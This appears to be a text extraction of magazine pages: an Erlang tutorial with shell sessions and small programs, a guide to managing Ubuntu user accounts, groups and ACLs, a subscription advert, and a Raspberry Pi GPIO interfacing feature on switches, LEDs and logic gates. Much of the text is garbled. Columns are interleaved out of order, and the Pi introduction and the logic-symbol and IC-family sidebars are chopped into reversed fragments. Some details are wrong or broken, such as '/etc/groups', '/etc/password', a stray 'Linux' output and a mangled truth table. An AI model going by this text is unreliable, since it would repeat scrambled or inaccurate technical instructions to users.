1> linux. linux 2> 12. 12 As you can see, the value of an atom is the atom itself! Although it looks strange to discuss the value of an atom or an integer, the functional nature of Erlang requires that each expression has a value, which also applies to atoms and integers, despite the fact that they are naïve expressions. A fun is a functional object that also allows you to create anonymous functions, which you can pass as arguments to other functions as if they were variables, without having to use

their names. Figure 2 shows a part of the use Erlang reference about the fun keyword – a forthcoming tutorial will talk more about anonymous functions. A map is a compound data type that can contain a variable number of key-value pairs. Each pair is called an element – the total number of elements is called the size of the map. The following shell command shows how to create a map:

1> MYMAP = #{country=>greece, city=>athens, year=>2016, date=>{nov,18}}. #{city => athens,country => greece,date => {nov,18},year => 2016} As you can understand, there are many functions that allow you to manipulate maps – you can see some of them in action in Figure 3. A list is another compound data type with a variable number of elements. You can define a new list in the Erlang shell as follows:

1> LIST1 = [a, b, 3, {a,b}]. [a,b,3,{a,b}] Please also bear in mind that behind the scenes Erlang treats strings as lists, so everything that can work on a list can also be used for strings. A unique process ID identifies each Erlang process. A PID has the following form and its own data type, which means that you cannot use a process ID as if it was a string:

1> self(). <0.57.0>




Right The use of b() and f() functions as well as the declaration of numeric variables in Erlang

Figure 1

Figure 2

Across This is a small part of the Erlang reference about the fun keyword

Figure 3

The self() function returns the process ID of the calling process. Similarly, the spawn() function returns the process ID of the new process, which is used for sending messages to it:

1> c(hw). {ok,hw} 2> spawn(hw, helloWorld, []). Hello, world! <0.65.0> As you can see, spawn() takes three parameters, which are the name of the module the function belongs to, the name of the function, and the parameters of the function, which are passed as a list. If the function takes no parameters, you should pass an empty list. Figure 3 shows how to define and process maps and lists inside the Erlang shell.

As you can see, the first element of a tuple has an index number of 1. Similarly, the setelement() function allows you to change the value of an existing tuple item in order to create a new tuple:

Tuples and guards

Tuples are handy as they let you group data and are frequently used in Erlang as well as other programming languages.

A guard will allow you to specify the kind of data a given function will accept. Although it might just look a little fuzzy at the moment, you will see Erlang code that uses guards later on in this tutorial. The when keyword indicates a guard. The condition of a guard is relatively simple and will allow you to do pattern matching based on the content of the argument and not just on its shape. A tuple is a composite data type, which means that a tuple allows you to combine multiple items into a single data type and store them using a single variable. Most of the times Erlang tuples group two to five items. Moreover, the first atom of a tuple usually identifies the purpose or the category of the tuple. You can declare a tuple as follows:


2> T1 = {linux, 1}. {linux,1} The element() function allows you to access a given item of a tuple: 3> element(1, T1). Linux

6> T2 = setelement(1, T1, unix). {unix,1}

Erlang functions

A function in Erlang is a sequence of function clauses that are separated by semicolons and terminated using a period/full stop (.). A function clause has the following form:

1> F=fun(X) -> 2*X end. #Fun<erl_eval.6.52032458> The previous code creates an anonymous function with one argument. The anonymous function is bound to a variable named F, which is also an atom. You can use it as follows:

Figure 4

Figure 5

Across How to define a map and a list in Erlang shell, including functions that help you deal with maps and lists Left The implementation of the process_tuple() function that illustrates how to process tuples

3> F(4). 8 4> F(4.5). 9.0 The number of the arguments of a function is called the arity of the function. It is the combination of the module name (m), the function name (f) and the arity (N) that uniquely identifies a function as m:f/N. As you might remember, you have to export a function in order to be able to use it outside of the module that it belongs to. The next example shows how to pass functions as arguments to other functions! Type the following at the Erlang shell:

1> F=fun(X) -> 2*X end. #Fun<erl_eval.6.52032458> 2> Five = fun(N, Function) -> 5 * Function(N) end. #Fun<erl_eval.12.52032458> 3> Five(10,F). 100 4> F(10). 20 Here, you define two anonymous functions, named F() and Five(). The Five() function takes two arguments, which is an integer ‘N’ and a function ‘Function’ and multiplies the numeric result of Function(N) with the number 5!

More about functions

Erlang supports much more complex functions than the ones you saw in the previous section. The following example will illustrate how to use a function to process a tuple. Please have in mind each tuple counts as a single function argument. A very common way to process tuples is by using pattern matching. Figure 4 shows the code of the process_tuple() function that processes tuples as found in tuples.erl. Executing tuples:main/0 generates the next output:

15> c(tuples). {ok,tuples} 16> tuples:main(). Size: 6 First element: [1,2] Size: 4 First element: a Ok The last example will show a function that processes tuples

using guards and a case statement, which is a pretty common practice in Erlang. Figure 5 shows the relevant Erlang code as found in more_fun.erl. Using more_fun:check_temp/1 generates the following kind of output:

11> c(more_fun). more_fun.erl:12: Warning: variable 'N' is unused more_fun.erl:14: Warning: variable 'N' is unused {ok,more_fun} 12> more_fun:check_temp({fahrenheit, 50}). 'Do not know about Fahrenheit!' 13> more_fun:check_temp({kelvin, 50}). 'Cannot tell about Kelvin!' 14> more_fun:check_temp({celsius, 50}). 'Way too hot!' 15> more_fun:check_temp({celsius, 10}). 'It is getting cold...' As you can see, not all case statements must have a guard.

More information about the Erlang shell

The q() function is the easiest way to exit the Erlang shell, but keep in mind that the q() function quits everything Erlang is doing. If you are working locally then there is no problem, but if you are working on a remote system you’d better quit by typing Ctrl+G and then Q. The reason is that you may shut down the Erlang runtime on the remote machine when quitting using q()! The built-in line editor of erl is a subset of Emacs. In Figure 6 you will see some more advanced commands of the Erlang shell including the declaration of a function, the use of the h() function to print the history list, and two alternative ways to exit the Erlang shell, the init:stop() function as well as the halt() function.

Getting user input

Although Erlang is primarily used for server applications, it can also allow you to interact with users. This section will teach you how to get user input from Erlang, which is pretty handy when you are developing small interactive programs or other command line utilities. Although it is relatively easy to get user input from the Erlang shell, the tricky part is verifying that the input is valid in order to avoid exceptions:




Right How to define a function inside the Erlang shell and the init:stop() and halt() functions that help you exit it

Figure 6

Figure 7

Across The code of userInput.erl illustrates one way of getting user input

As you will see, Erlang is not particularly good at dealing with strings. Additionally, it is the job of the developer to check that the input is in the right form and of the desired data type because improper data might create troubles when you attempt to process it. There are other ways to get user input, including reading characters and reading entire lines of text â&#x20AC;&#x201C; you will learn more about it in the Erlang tutorial in the next issue.

1> {ok, [VAR]} = io:fread("input : ", "~d"). input : 123 {ok,"{"} 2> VAR. 123 3> {ok, [OTHER]} = io:fread("input : ", "~d"). input : abc ** exception error: no match of right hand side value {error,{fread,integer}} Figure 7 shows sample Erlang code that teaches you how to get user input and make sure that you take what you want, which you might find more complicated than expected, especially if you are familiar with other programming languages. Executing userInput.erl generates the following kind of output:

1> c(userInput). {ok,userInput} Please give {Name, Surname} >> There is an error somewhere. Please give {Name, Surname} >> 'Tsoukalos'}. Hello 'Mihalis' 'Tsoukalos'! Please give {Name, Surname} >> A tuple is needed! Please give {Name, Surname} >> Bye! ok

asd, asd. {'Mihalis', 12. quit.

As you can imagine, the key role is played by the function that checks the return value of the io:read() function, which is a tuple. Additionally, the user needs to end each input with a dot.


Creating Erlang scripts

The escript binary file allows you to create Erlang scripts, which is an attractive capability of Erlang found in most scripting languages. The following Erlang script accepts one command line argument and asks the user for their name, using a simplified version of the code found in userInput.erl:

#!/usr/bin/env escript %% -*- erlang -*main([String]) -> try N = list_to_integer(String), I = io:read("Please give {Name} >> "),

Filesystems and the Erlang shell There will be times when you would like to move to another directory while you are working in the Erlang shell. Look at the following interaction with the Erlang shell:

1> pwd(). /home/mtsouk OK 2> cd(".."). /home OK 3> pwd(). /home OK So, the cd() function allows you to change the current directory, whereas pwd() prints the current working directory.

process_input(I), io:format(": ~w ~n", [N])

Figure 8

catch _:_ -> usage() end; main(_) -> usage().

Left The use of the fibo() function found in fibo1.erl

usage() -> io:format("usage: scriptName integer\n"), halt(1). process_input({ok, Data}) when is_tuple(Data) -> Name = element(1, Data), io:format("~w", [Name]); process_input({error, _}) -> io:format("There is an error somewhere.~n"). After creating the script file, you should change its permissions:

$ chmod 755 aFile.erl $ ls -l aFile.erl -rwxr-xr-x 1 mtsouk staff 0 Nov 14 15:30 aFile.erl Next, you can execute aFile.erl as if it was a regular shell script:

$ ./aFile.erl 123 Please give {Name} >> {'Mihalis'}. 'Mihalis': 123

Calculating Fibonacci numbers We will now learn how to calculate Fibonacci numbers in a different way than the one you saw in the previous issue of Linux User and Developer. The code of the fibo() function, which can be found in fibo1.erl, is the following:

fibo(N) when N > 0 -> fibVar(N, 0, 1). fibVar(0, F1, _F2) -> F1; fibVar(N, F1, F2) -> fibVar(N - 1, F2, F1 + F2). You can see its performance using the time(1) command in Figure 8. The implementation of fibo() in fibo1.erl uses another function that is named fiboVar() and takes three arguments instead of just one. However, as fiboVar() is only used internally, it does not need to be in the export() list of the module. The only function in the export() list is main/1.

Figure 9

As you can see, you just have to embed your Erlang code into a text file in a specific way and read the command line arguments as a list using the list_to_integer() function. This is a very pretty way of creating small Erlang programs that do specific but relatively small tasks. The next tutorial will talk about many interesting things including formatting output, lists, maps, records and message passing between Erlang processes. Until then, write as much Erlang code as you can!

Left The use of the fibo() function found in fibo2.erl as well as its entire Erlang code

Infinite loops The following Erlang code, when combined with a negative integer as an argument, generates a function that keeps running and never ends:

fibo(0) -> 0; fibo(1) -> 1; fibo(N) -> fibo(N - 1) + fibo(N - 2). In other words, you should be very careful when defining the arguments that a function can accept, and put guards where necessary in order to avoid such bugs. A more appropriate and secure definition of fibo() would be the following:

fibo(N) when N > 0 -> fibVar(N). fibVar (0) -> 0; fibVar (1) -> 1; fibVar (N) -> fibVar (N - 1) + fibVar (N - 2).

More about Fibonacci numbers Although the Erlang code of fibo1.erl is different from the code you saw in the previous issue, there is another way to calculate Fibonacci numbers in Erlang, which is presented in fibo2.erl. The implementation of the fibo() function, which uses a list, as well as its performance, can be seen in Figure 9. Just remember to compile the code first using erlc, which is the Erlang compiler. As you can see, not all Fibonacci implementations are equal!



User accounts

Manage user accounts in Ubuntu Learn how to effectively manage user accounts, permissions, groups and more

Swayam Prakasha

has a master’s degree in computer engineering. He has been working in information technology for several years, concentrating on areas such as operating systems, networking, network security, electronic commerce, internet services, LDAP and web servers. Swayam has authored a number of articles for trade publications, and he presents his own papers at industry conferences. He can be reached at swayam.prakasha@


Unix / Linux Administration

The Beginner’s Guide to Managing Users and Groups on Linux

Managing Linux User Account Security

Managing Ubuntu Linux Users and Groups

Figure 1 Details of the useradd command


As you might expect, adding and managing users is the most common task of any Linux system administrator. User accounts help in keeping boundaries between the people who use the system and the processes that run on the system. Groups are a means of assigning rights to your system. As expected, each user needs to have a separate user account. Having a user account provides an area in which you can securely store files. One way to add user accounts is through the User Manager windows. The other, very straightforward method for creating a new user from the shell is to use the useradd command. After opening a Terminal window, you just need to invoke useradd at the command prompt. But, please note that for this, you need to have root permissions. The useradd command has one required field – the login name of the user – but you can also include some additional information using various options. The following table describes some of the popularly used options with the useradd command. Option -c “comments” -d home_dir -e expiry_date -p passwd -f -1 -s shell

Description Provide a description of the user account Set the home directory to use for the specific account Assign the expiration date for the user account Enter a password for the account that you are adding Set the number of days after which password expires Specify the command shell to use for this account

Please note here that we have started with sudo as useradd needs root privileges. We are trying to create an account for a new user, in this case, the author. Once the user is created, the next step is to set up the initial password. This can be done using the passwd command as shown below (the example includes the author’s username; this would be replaced by the username of the user you will be adding).

~$ sudo passwd swayam A successful execution of the above command prompts the user to type the password twice. The useradd command determines the default values for new accounts by reading the /etc/login.defs and /etc/default/ useradd files. You can modify these default values by editing the files manually with any text editor. It needs be noted here that login.defs is different on different Linux systems. Some of the parameters that can be configured in /etc/login.defs file are given here.

PASS_MAX_DAYS PASS_MIN_DAYS PASS_MIN_LEN PASS_WARN_AGE Please note that all uncommented lines in /etc/login.defs file contain a keyword / value pair. As an example, the keyword PASS_MIN_LEN is followed by some white space and the value 5. This tells the useradd command that the user password must be at least five characters. You can refer to the /etc/default/ useradd file in order to view the other default settings. You can also see the default settings by using the command useradd with the –D option.

Let’s look at the useradd command with an example.

~$ sudo useradd -c “Swayam Prakasha” swayam

You can also use the –D option to change the default settings. In order to do this, give the –D option first and then add the defaults you want to set. For example, to set the default home directory location to /home/swayam, for example, you can use the following command.

~$ useradd -D -b /home/swayam In addition to setting up user defaults, an administrator can also create default files that are copied to each user’s home directory for use. These files typically include login scripts and the shell configuration files. Let’s take a look at another useful command – usermod – that can be used to modify the settings for an existing account. This command provides a straightforward method for changing the account parameters. Many of the options available with

Above A look at the default settings the usermod command mirror those found in the useradd command. The popular options that you can use with usermod command are: • -c username - Change the description associated with the user account. • -d home_dir - Change the home directory to use for a specific account. • -e expire_date - Assign a new expiration date for the account. • -l login_name - Change the login name of the user account. • -s shell - Specify a different command shell to use for this account. Now let’s take a quick look at some of the examples for the usermod command.

~$ usermod -s /bin/csh [username] This changes the shell to csh for the named user.

~$ usermod -Ga accounting [username] -Ga makes sure that the supplementary groups are added to any existing groups for the specific user. Another command that will come in very handy in user accounts management is userdel. This command can be used to remove users.

~$ userdel -r [username]

from the /etc/password file. Since we have used the –r option, it removes the user’s home directory as well. We need to keep in mind here that simply removing the user account does not change anything about the files that the user leaves around the system (except in cases where we use the –r option). Now it is time to understand more about group accounts on Ubuntu systems. The concept of group accounts will come into the picture if we need to share a set of files with multiple users. You can create a group and change the set of files to be associated with that group. Please note that the root user can assign users to a group so that they can have access to files based on the group’s permissions. Every user is assigned to a primary group. By default, that group is a new group with the same name as the user. You can easily identify the primary group by the number in the third field of each entry in the /etc/ passwd file. Linux typically stores the list of all users in a file called /etc/ groups. You can run a command in the Terminal to view as well as to edit the users and groups in the system

~$ sudo vigr /etc/groups Let’s look at how to create group accounts. As a root user, you will be able to create new groups by using the command groupadd at the command line. Also, note that groups are created automatically when a user account is created. Let’s take a look at a couple of examples:

~$ groupadd mars Here, a group named Mars is created with the next available group ID.

When the above command is executed, the user is first removed

User accounts help in keeping boundaries between the people who use the system and the processes that run on it

~$ groupadd -g 14235 venus A group named Venus is created with a group ID of 14235.

Disable root login When you have your own account set up, it is good practice for you to go and disable SSH remote login for root. This can be done by modifying the contents of a configuration file /etc/ssh/sshd_ config. Look specifically for PermitRootLogin and set it to no.



User accounts

If you are interested in changing a group at a later point in time, you can use the groupmod command.

~$ groupmod -g 300 mars The group ID of Mars is changed to 300.

~$ groupmod -n stars venus The name Venus is changed to Stars. Let’s turn our attention to Access Control Lists (ACLs). With the help of ACLs, one user can allow others to read, write and execute files and directories without requiring the root user to change the user or group that's assigned to them. There are a few important things to know about ACLs: • ACLs need to be enabled on a file system when that file system is mounted • To add ACLs to a file, you use the setfacl command • To view ACLs set on a file, use the getfacl command • To set the ACLs on any file or a directory, you need to be the actual owner assigned to it Let’s take a detailed look at the setfacl command. The system administrator can use this command to modify the permissions (by using the –m option) or to remove the ACL permissions (by using the –x option).

Below A look at users and groups

~$ setfacl -m u:[username]: rwx file_name

In this command, first we used the modify (–m) option followed by the letter u – this indicates that we are setting the ACL permission for a specific user. Then we have specified the username after the colon. After another colon, we have the permissions that we want to assign. We can assign read (r), write (w) and / or execute (x) permissions to the user or the group. Another important aspect that we need to understand with reference to ACL is related to the set-up of default ACLs. Setting up default ACLs on a directory enables your ACLs to be inherited. In other words, when we create new files and directories in that directory, they are assigned the same ACLs. In order to set a user or group ACL permission as default, you just need to add ‘d:’ to the user or group designation. You can make sure that the default ACL will work by creating a subdirectory and running the getfacl command. After that, you will see that the default lines are added for the user, group and so on, which are actually inherited from the directory’s ACL. Next, let’s look at how we can enable ACLs. Basic Linux file systems that we create after installation have only one user and group assigned to each file and directory and thus, they do not include ACL support by default. In order to add ACL support, we need to add the acl mount option when we mount it. This can be done in multiple ways. You can add the acl option to the fourth field in the line in the /etc/fstab file that automatically mounts the file system when the system boots up, or you can add the acl option to the mount command line when you mount the file system manually by using the mount command.

/dev/sdc1 ext4 acl

/var/extra_stuff 1


Here, we are trying to mount the ext4 file system located on the /dev/sdc1 device to the /var/extra_stuff directory. Note that instead of the default entry in the fourth field, we have added acl. If there were already other options set in that field, we need to add a comma after the last option and then add acl. With this acl field, the next time the file system is mounted, ACLs are enabled. For the second option, add ACL support by mounting the file system by hand and using the acl option with mount. This can be done using a command similar to this:

:~$ mount -o acl /dev/sdc1 /var/extra_stuff It is important to note here that the mount command only mounts a file system temporarily. When the system boots, the file system is not mounted again. Thus it is necessary to have an entry in the /etc/fstab file. Let’s take a look at how to add directories for users so that they can collaborate among themselves. When we talk about permissions, we know that there are read, write and execute bits for users, groups and others. In addition to these bits, there are special file permission bits that can be set by using the chmod command. The bits that you need to use for creating collaborative directories are the set group ID bit and the sticky bit. There are specific numeric values associated with these bits:


Name Set user ID bit Set group ID bit Sticky bit

Numeric value 4 2 1

You can use the set group ID bit for creating the group’s collaborative directories. The set UID (user ID) and set GID (group ID) bits are typically used on special executable files that allow commands to be run differently. In a normal situation,

command that determines the permissions the command has to access the resources on the machines. For example, a set UID command owned by root will run with root commands. The default way of authenticating users is to check the user information against the contents of the /etc/passwd file and the passwords from the /etc/shadow file. But there are other methods. It’s common practice in large enterprises to store the user account information in a centralised authentication server. The advantage with this set up is that when we install a new Linux system, we do

Above Details of the setfacl command

We can have the Linux system query the authentication server when someone tries to log in when a user runs a command, that command runs with that user’s permissions. For example, if we run the cat command as the user Jo, that instance of the cat command would have the permissions to read and write files that the user Jo could read and write. Commands with the set UID or set GID bits set are different. It is the owner and the group assigned to the

Implement password policies Whenever we have more remote users, it is always important to implement and enforce reasonable password policies. This can be done by using the Linux PAM module, called With this module, you can prevent weak password usage.

not need to add user accounts to that system. Instead, we can have the Linux system query the authentication server when someone tries to log in. For authenticating users with a centralised auth server, we need to provide the account information including username, user/group IDs, default shell etc, and the authentication method. A restricted deletion directory is created by turning on a directory’s sticky bit. In a normal situation, if write permission is open to a user on a file or a directory, then that user can delete that file or the directory. But when it comes to a restricted deletion directory, unless you are the root user or the owner of the directory, you will not be able to delete another user’s files.


Special offer for readers in North America

7 issues FREE FREE

When you subscribe

resource downloads in every issue

The open source authority for professionals and developers

Order hotline +44 (0)1795 418661

Online at *Terms and conditions This is a US subscription offer.

You will actually be charged ÂŁ80 sterling for an annual subscription. This is equivalent to $105 at the time of writing, exchange rate may vary. 7 free issues refers to the USA newsstand price of $16.99 for 13 issues being $220.87, compared with $105 for a subscription. Your subscription starts from the next available issue and will run for 13 issues. This offer expires 30th April 2017.



for this exclusive offer!



Raspberry Pi 58

“Go beyond using off-the-shelf interfaces like HATs, or even building circuits that others have designed, by designing your own electronic circuits”

Contents 68

Raspberry Pi air drum kit


Make an egg-drop game with the Sense HAT


Make a Pi-based warrant canary


A Raspberry Pi photo frame



Secrets of Pi interfacing

of tronic c le e le p im s n desig Learn how to rface your Raspberry e circuit s to int al-world devices Pi to re Pi to ch as a Raspberry oard computer su ills. sk t en fer dif Using a single-b requires two quite es vic de d orl you , l-w nd control rea t code, and seco be able to churn ou to ed ne . u es yo vic st, Fir external de interface the Pi to in need to be able to those areas and, of nd co se the at k elf loo sh ewe -th Here yond using off ate how to go be have particular, investig circuits that others ing ild bu Ts, or even . Using its cu cir interfaces like HA ic on ctr ning your own ele hes, designed, by desig le to connect switc , you’ll soon be ab ide gu ms, gra dia it cu cir this hands-on t Here we’ll presen re. mo ch ide mu gu so r d LEDs an m, see our earlie familiar with the t no na e tur u’r to yo w if ho t bu explained veloper 169), which (Linux User & De o a working circuit. but circuit diagram int the Raspberry Pi, is is interfacing to ch su rs ute mp Our main emphas co er small o be applied to oth cations. pli ap ol most of this can als ntr co for ich are also popular as the Arduino, wh

UNDERSTAND THE PI’S GPIO HARDWARE Discover the Pi’s GPIO hardware – its gateway to the real world Even if you’ve never connected external devices to your Raspberry Pi, you can’t fail to have noticed the double row of 40 pins at the edge of the board (26 pins on the early Pis). This is the GPIO header, otherwise known as the general-purpose input/ output connector, and it provides a means of interfacing to real-world devices. Before starting to think about designing circuits to interface to the Pi, therefore, it’s important to understand the basics of the GPIO hardware.


Although referred to as the GPIO header, not all the pins connect to the GPIO hardware. Some of the other pins provide power and ground connections that are also used by hardware that’s connected to the header. The Pi’s GPIO header has eight ground pins (GND), which you can identify from the documentation. Ground is equivalent to the negative side of the power supply and is often referred to as 0V (ie zero volts). The GPIO header also has four power supply pins: two that provide +3.3V and two that provide +5V. Using the ground and power supply pins allows you to obtain power from the Pi for your external interface circuitry so you don’t need a separate power supply.

GPIO pin numb ering

There are two numb ering schemes for GPIO pins. First there’s the physical numb ering. This reflects each pin’s position on the header, so it runs from 1 and 2 at on e end to 39 and 40 at the oth er. Then, for the ac tual GPIO pins (as oppo sed to power supp lies), there are GPIO nu mbers. You can ch oose to use either schem e in the software.


The Raspberry Pi’s GPIO operates from a supply of 3.3V, so you shouldn’t present a higher voltage to any of the pins. Doing so will probably destroy the Pi. However, there are ways of interfacing to devices that require higher voltages, as we’ll see later in the ‘Exceed limits safely’ section (on page 66). In fact, there are even ways of interfacing to mains-powered equipment and this is also something we’ll discuss. The maximum voltage isn’t the only way of exceeding the GPIO’s maximum rating; you should also adhere to its maximum current of 16mA (and a total of 50mA for all GPIO pins). In practice, this means that you’ll easily be able to drive an LED, which doesn’t require much current, but driving a higher-powered device such as an electric motor requires a bit more attention. Again, this is covered in the ‘Exceed limits safely’ section.


With two exceptions, the remainder of the pins on the GPIO header are GPIO pins although some also have secondary functions that we’re not going to get embroiled in here. As the phrase ‘general-purpose input/ output’ suggests, these pins can be configured in the software to act either as inputs or outputs. When programmed as inputs, these pins could be connected to a switch, for example, and the software would be able to read whether the switch was open or closed, i.e. on or off. Alternatively, when programmed as outputs, these pins could be connected to an LED, and the software would be able to turn it on or off.



Secrets of Pi interfacing


Interfacing a switch or an LED to the GPIO header really couldn’t be simpler


Wire in the switch

The first job in interfacing a switch to the Pi is to connect one of the switch’s two terminals to a GPIO pin (which will be configured as an input in the software) and connect the other of its terminals to 0V (GND). Having done this, the GPIO pin will be connected to 0V, a condition that the software will see as a logic 0, whenever the switch is closed, ie held down in the case of a push button or in its ‘on’ state with a mechanically latching toggle switch.


Add a pull-up resistor


Use built-in pull-ups

Although a GPIO pin wired to a switch and 0V will be at logic 0 when the switch is closed, it will be ‘floating’ when it’s open. In other words, it wouldn’t be certain whether it would be seen as a 0 or a 1. To overcome this, it must be wired to +3.3V via a resistor, which is referred to as a pull-up resistor. Now, the GPIO pin will be logic 1 when the switch is open. The resistor value isn’t critical, but 10k is a good choice.

If you’re wiring the switch to some types of other single-board computer or to the Pi’s GPIO via some logic circuitry, an external pull-up resistor is the only solution. However, if you’re interfacing directly to a GPIO pin, you can, as an option, enable an internal pull-up resistor in the Pi’s circuitry. The bit of code reproduced here shows how this is done using the RPi.GPIO Python library. The circuit diagrams in the remaining steps assume an external pull-up, but, if you’re using an internal pull-up, just omit the 10k resistor.


GPIO.setup (2, GPIO.IN, pull_up_down=GPIO.PUD_UP) # set GPIO 2 as input with pull-up


Limit the current


De-bounce the switch

Because GPIO pins are bidirectional, there’s a potential problem if a pin that’s attached to a switch is accidentally configured as an output and set to a logic 1. This will put 3.3V on the pin which, if the switch is then closed, would be connected directly to 0V. This would cause a high current to flow and, potentially, damage the Pi. Putting a resistor in series with the switch will prevent this, and 1k is the recommended value. The series resistor is also integral to the circuit in the next step, so don’t omit it if you want to add de-bounce circuitry.

When a switch is operated, the contacts often open and close several times very quickly for a short time. This is called bounce, and it might cause problems. Perhaps

pressing a push button is supposed to turn a LED on or off. Now, if the LED is off and you press and release the push button but it switches closed-open-closed-open instead of closed-open, the LED will switch on and off again very quickly, but it would appear that nothing has happened. This is remedied by adding a capacitor as shown – a value of 100n is typical if you’re using a 1k current-limiting resistor. Alternatively, software de-bounce can be selected in the RPi.GPIO library.

Resistor and capacit or values

Often, the values of res istors and capacitors are not critical, and typical used. However, when inte values can be rfacing an LED, you mu st work out the value of resistor. Often you’ll find the current-limiting that you can’t buy a res istor of the value you’ve resistors (and capacitors) calculated because only come in certain pre ferred values. In the common E-12 ser ies, these values are 1.0, 1.2, 1.5, 1.8, 2.2, 2.7, 3.3, and 8.2. However, you may 3.9, 4.7, 5.6, 6.8 come across additional values from other series. can be multiplied by pow These values ers of ten. So, in the cas e of resistors, in addition you’ll find 47, 470, 4.7k, to 4.7, for example, 47k, 470k and 4.7M. If a resistor isn’t availab le in a value you calculat ed, the general rule is to case of an LED current-lim play it safe. In the iting resistor, this means picking the closest larg er value.

and possibly damaging the Pi. This is prevented by adding a series resistor which drops the excess voltage. The resistor must drop the difference between 3.3V and the LED’s forward voltage. The value is worked out using Ohm’s law, as described in the next step.


Use multi-way switches


Understand LED basics


Limit the current

A multi-way rotary switch is handled in just the same way as a single-way switch except that it connects to several GPIO pins and requires the interface circuitry described earlier for each of those pins. The circuit diagram shows how this would be done for a four-way switch. De-bounce capacitors aren’t included because bounce isn’t as much a problem with a multi-way or toggle switch as it is with a push button, because of their mechanically latching nature.


Use Ohm’s law

First you need to decide the drive current for the LED. This must be less than the LED’s recommended current and less than the GPIO pin’s maximum of 16mA. Also, the total current drawn from all GPIO pins must be less than 50mA. 10mA will often give enough light, even if the recommended current is greater. Ohm’s law is summarised as V = I R. This can be rearranged as R = V / I to give the value of the resistor, R, where V is the voltage that needs to be dropped (ie 3.3V minus the LED’s forward voltage), and I is the drive current. For example, a forward voltage of 2.0V and a current of 10mA (0.01A) will require a value of (3.3 – 2.0) / 0.01 = 130 ohms.

An LED (light-emitting diode) is a component that produces light when a current flows through it. It’s a polarised device, so its anode must always be connected to the positive supply and its cathode to the negative supply. A fundamental property of an LED is its forward voltage, which is usually between 1.8V and 3.3V depending on its colour and type. An LED requires this voltage in order to illuminate. Also important is the recommended current, at which its brightness and so on will be quoted. All these parameters are shown in the LED’s specification sheet.

Turning on a LED from a GPIO pin involves configuring the pin as an output and then outputting a logic 1. This puts 3.3V on the pin, but this will probably exceed the LED’s forward voltage, thereby causing its maximum current to be exceeded, destroying the LED


White and blue LEDs

Some LEDs – mainly blue, white and ‘pure green’ – have forward voltages higher than 3.3V, so they can’t be driven directly from a GPIO pin. Even if the value is specified as 3.3V, driving it directly from a GPIO pin would not be safe or reliable. The solution is to drive it from a higher voltage, as discussed later in the ‘Exceed limits safely’ section (page 66).



Secrets of Pi interfacing

LOGIC CIRCUITRY EXPLAINED Understand logic circuitry to add extra functionality to your interface Since the processor in the Raspberry Pi can carry out any imaginable logic operation, it might be reasonable to assume that there’s no benefit to be gained from using external logic circuitry. While this would be true if the Pi has sufficient GPIO pins for your application, if you’re getting close to the limit then by using external hardware logic, you can reduce the number of pins needed. Our step-by-step guide provides some examples of how to do this; here we provide an introduction to logic circuitry.


Logic components operate on two voltages that represent the binary values of 0 and 1 although, for some applications, it might be more appropriate to think of them as off and on respectively. In the case of the Pi’s GPIO pins, 0 is represented by 0V (GND) while 1 is represented by 3.3V. With other singleboard computers that use a 5V supply, 0 is still represented by 0V, but 1 is represented by 5V. You should choose a family of logic chips (see ‘IC logic families’) to match the supply voltage of your computer.


The simplest logic component is the inverter, which has one input and one output – see the diagrams for symbols of all logic gates. As the name suggests, its function is to invert the value on its input; so, if the input is 0 then the output will be 1 and if the input is 1 then the output will be 0. The operation of a logic component is often defined by a truth table and, while it’s barely necessary in this simple case, the truth table for an inverter appears here: Input 0 1

Output 1 0

Understandin g logic symbo ls


The diagram sh ows the standa rd symbols for various logic ga the tes. Each of th ese has one or inputs at the lef more t and a single ou tput at the right notice that som . You’ll e symbols have little circles on outputs. Thes their e are gates that have inverted So, for example outputs. , the symbol fo r a NA means Not AN ND gate (which D) is the same as that for an AN D gate except for its inv erted output. Most other log ic devices, for example a 2-to decoder, are jus -4 t shown as squa re or rectangu boxes, again us lar ually with the inp uts on the left the outputs on and the right. Beca use so many dif devices would ferent otherwise look the same when as boxes, thes shown e symbols are usually annota their part num ted with ber (eg 74HC13 8) and the vario and outputs ar us inputs e labelled with their function usually their pin and numbers. Logic devices connec 0V and a powe t to r supply and wh ile th es usually appear e connections on more compli cated logic devic they aren’t norm es, ally shown on ga tes.


Next up after the inverter is a group of logic components referred to as gates. Gates can have any number of inputs (although two is the most common), and one output. To set the ball rolling we’ll look at the 2-input AND gate, the function of which can be summed up as follows. If input 1 is 1 AND input 2 is 1 then the output is 1; all other combinations of the inputs result in an output of 0. Using a similar statement, we can sum up the function of the OR gate as follows. If input 1 is 1 OR input 2 is 1 then the output is 1; all other combinations of input (actually there is only one other combination) result in an output of 0. Truth tables for the 2-input AND gate and the 2-input OR gate appear here. Input 1 0

Input 2 0

Output 0

0 1 1

1 0 1

0 0 1

Input 1 0

Input 2 0

Output 0




1 1

0 1

1 1


The phrases NAND gate and NOR gate might sound odd at first. However, if we point out that NAND means Not AND, and that NOR means Not OR, then the pieces start to fall into place. A NAND gate is effectively an AND gate with an inverter connected to its output and its truth table is that same as that for the AND gate but with the 0s in the output column changed to 1s and vice versa. Similarly, a NOR gate is an OR gate with an inverter connected to its output, so its truth table is the same as that for the OR gate, again with the 0s and 1s swapped in the output column. The one remaining type of gate is the XOR gate, which stands for eXclusive OR gate, and the truth table of which appears here. Input 1 0

Input 2 0

Output 0




1 1

0 1

1 0

You’ll notice that it’s the same as the truth table for the OR gate, but differs in that the output is 0 when both inputs are 1. Another way of looking at its function is that its output is 1 when the inputs are different, otherwise the output is 0.

IC logic families





7400 type of logic devices is the One of the most common , the form 74<family><id> of s ber num t par e hav series. These <id> is a number and ily fam es seri 0 740 where <family> is the ers at the n. There might also be lett that defines the functio , for 00N 4LS SN7 se. tho ignore star t and end, but you can ily device (LS) and fam y ottk Sch wer -po example, is a low each chip d 2-input NAND gate (ie its function (00) is a qua



The inverter and the various types of gate are the most fundamental logic components, but they’re just the tip of the iceberg. Dozens of other components are available, although in reality, nearly all of their functionality could be duplicated by some combination of the basic logic components. Most of these components have symbols that are just rectangular boxes with their inputs and outputs labelled, so you’d need to consult the truth tables, which appear in their specification sheets, to understand their function. Because we’re going to use it later in the step-by-step, we’ll look at just one example which goes by the name 2-to-4 decoder. The truth table of one of the two the 2-to-4 decoders in the 74HC139 chip appears here (X means ‘either 0 or 1’).



74 series D gates). There are several contains four 2-input NAN to the Pi’s ctly dire ng wiri for able suit families and most are not puts, and k with 3.3V inputs and out ch GPIO pins. Some won’t wor -mounting packages, whi ace surf in le ilab ava several are only recommendation is Our up. wire to s teur are difficult for ama ilable in 3.3V compatible and is ava the 74HC family, which is through-hole packages.

Input 1 E 1

A1 X

A0 X

